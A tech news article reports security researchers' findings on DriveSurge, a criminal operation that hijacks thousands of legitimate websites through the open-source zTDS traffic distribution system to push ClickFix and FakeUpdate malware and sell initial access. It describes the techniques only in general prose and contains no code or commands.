Skip to content
Tech News
← Back to articles

DriveSurge Hijacks Thousands of Sites for ClickFix, FakeUpdate Attacks

2026-06-02 | original
read original get Malware Removal Tool → more articles
Why This Matters

DriveSurge represents a sophisticated and organized cybercriminal operation that hijacks legitimate websites to deliver malware through ClickFix and FakeUpdate campaigns. Its extensive infrastructure and use of open-source traffic distribution systems highlight the evolving tactics threat actors employ to evade detection and monetize compromised systems. This campaign underscores the ongoing risks to both consumers and the tech industry from advanced, organized cyber threats.

Key Takeaways

Threat actors have compromised thousands of websites for the purpose of engineering industrialized ClickFix and FakeUpdate attacks in an organized malware delivery operation aimed at selling initial access to systems. The campaign targets not only Windows users but also macOS systems and appears to be a mature cybercriminal ecosystem that avoided detection for nearly a year.

The operation — dubbed DriveSurge by the researchers at Silent Push who discovered the activity — appears to function as an initial access broker (IAB) "using a pay-per-install (PPI) model to supply downstream threat actors with high-quality victim leads," according to a recently published report.

The operation's primary weapon is a technique known as a traffic distribution system (TDS), which specifically uses an open source variant called zTDS. zTDS, in use since at least 2015, is publicly available at ztds[.]info. This system acts as the foundational engine of the activity, with compromised websites setting zTDS domains for traffic victims of ClickFix and FakeUpdate websites, acccording to Silent Push.

Related:BTMOB RAT Spreads Across Brazil, LatAm via MaaS Model

"Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," the report reads.

Targeted Payload Delivery

DriveSurge's infrastructure is quite extensive, including payload repositories, PowerShell downloaders, staging servers, and multiple fallback domains designed to maintain resiliency if portions of it get taken down, the researchers discovered. Attackers also avoid detection using obfuscated JavaScript that uses Base64 encoding, dynamic URL construction, and failover logic to retrieve malicious code while avoiding detection.

One notable part of the operation's strategy involves using an obfuscated payload hosted on its infrastructure that performs extensive victim profiling, according to the report. Attackers collect information about the target environment through the malware's features, which includes identifying OS characteristics, communicating with attacker-controlled endpoints, and dynamically building payloads based on the victim's platform.

The activity is unique for its scope, Waseem Ahmed, head of engineering for Secure.com, tells Dark Reading. Noting that "ClickFix and fake-update pop-ups have been the way in for a while now," he says what's different with DriveSurge "is the scale and the business behind it."

"[It's] the crew quietly running this across thousands of hacked-but-legitimate sites, then selling that access to whoever wants it," he says. "Think less burglar, more the guy selling keys to burglars."

... continue reading

Explore topics: drivesurge ztds clickfix fakeupdate silent push
Related:
Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks
Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
Apple @ Work: Why the ClickFix campaign means it is time to kill the 90 day update deferral
FBI director's Based Apparel site has been spotted hosting a 'ClickFix' attack
How AI can trick you into making fake payments - 5 red flags

© 2026 GoKawiil

About | Editorial Policy | Contact